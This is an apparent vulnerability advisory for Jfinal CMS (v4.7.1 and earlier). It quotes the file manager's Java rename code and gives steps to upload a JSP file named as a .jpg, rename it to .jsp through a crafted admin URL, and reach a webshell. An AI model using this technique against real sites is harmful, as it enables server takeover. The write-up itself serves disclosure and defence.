Jfinal cms Any file renamed in the background, Getshell

## Jfinal cms Any file renamed in the background, Getshell ### Introduction to Vulnerability Jfinal cms, using the simple and powerful JFinal as the web framework, the template engine is beetl, the database uses mysql, front-end bootstrap, flat ui and other frameworks. Support multi-site, oauth2 authentication, account registration, password encryption, comments and replies, message prompts, website traffic statistics, article comments and pageview statistics, response management, rights management, etc. The background template management office does not filter the new file name passed in by the user, resulting in getshell. ### Vulnerability Impact - <= v4.7.1 ### Vulnerability Analysis The vulnerability trigger point is in `com/jflyfox/modules/filemanager/FileManagerController.java` ```java public void index() { HttpServletRequest request = getRequest(); try { request.setCharacterEncoding("UTF-8"); getResponse().setCharacterEncoding("UTF-8"); } catch (UnsupportedEncodingException e) { e.printStackTrace(); } FileManager fm = new FileManager(getRequest()); JSONObject responseData = null; String mode = ""; String path = ""; boolean needPath = false; boolean putTextarea = false; if (!auth()) { fm.error(fm.lang("AUTHORIZATION_REQUIRED")); } else { String contextPath = request.getContextPath(); // 设置contextPath fm.setGetVar("contextPath", contextPath); mode = request.getParameter("mode"); path = request.getParameter("path"); if (path != null) { try { if (request.getMethod().equals("GET")) path = new String(path.getBytes("ISO8859-1"), "UTF-8"); } catch (UnsupportedEncodingException e) { e.printStackTrace(); } needPath = fm.setGetVar("path", path); } if (request.getMethod().equals("GET")) { if (mode != null && mode != "") { if (mode.equals("getinfo")) { if (needPath) { responseData = fm.getInfo(); } } else if (mode.equals("getfolder")) { if (needPath) { responseData = fm.getFolder(); } } else if (mode.equals("rename")) { String oldFile = request.getParameter("old"); String newFile = request.getParameter("new"); try { oldFile = new String(oldFile.getBytes("ISO8859-1"), "UTF-8"); newFile = new String(newFile.getBytes("ISO8859-1"), "UTF-8"); ``` When the incoming mode is rename, the `FileManager.rename()` handler is called, followed by `rename()` ```java public JSONObject rename() { String oldFile = this.get.get("old"); String newFile = this.get.get("new"); oldFile = getFilePath(oldFile); if (oldFile.endsWith("/")) { this.get.put("old", oldFile.substring(0, oldFile.length() - 1)); } boolean error = false; JSONObject array = null; String tmp[] = oldFile.split("/"); String filename = tmp[tmp.length - 1]; int pos = oldFile.lastIndexOf("/"); String path = oldFile.substring(0, pos + 1); File fileFrom = null; File fileTo = null; try { fileFrom = new File(this.fileRoot + oldFile); fileTo = new File(this.fileRoot + path + newFile); if (fileTo.exists()) { if (fileTo.isDirectory()) { this.error(sprintf(lang("DIRECTORY_ALREADY_EXISTS"), newFile)); error = true; } else { // fileTo.isFile this.error(sprintf(lang("FILE_ALREADY_EXISTS"), newFile)); error = true; } } else if (!fileFrom.renameTo(fileTo)) { this.error(sprintf(lang("ERROR_RENAMING_DIRECTORY"), filename + "#" + newFile)); error = true; } } catch (Exception e) { if (fileFrom.isDirectory()) { this.error(sprintf(lang("ERROR_RENAMING_DIRECTORY"), filename + "#" + newFile)); } else { this.error(sprintf(lang("ERROR_RENAMING_FILE"), filename + "#" + newFile)); } error = true; } if (!error) { array = new JSONObject(); try { array.put("Error", ""); array.put("Code", 0); array.put("Old Path", this.get.get("old")); array.put("Old Name", filename); array.put("New Path", path + this.get.get("new")); array.put("New Name", this.get.get("new")); } catch (JSONException e) { this.error("JSONObject error"); } } return array; } ``` There is no restriction or filtering on the new file name passed by the user, which directly causes the malicious attacker to rename the file to a jsp file. ### Vulnerability recurrence 1. Login to the background 2. Click on Template Management 3. Click Upload to upload a file named shell.jpg with the contents ``% out.print("123");%>`  4. Rename the file and change shell.jpg to shell.jsp ``` Http://localhost:8080/jfinal_cms/admin/filemanager?mode=rename&old=%2Fjfinal_cms%2Fshell.jpg&new=shell.jsp&config=filemanager.config.js ```  5. Access the shell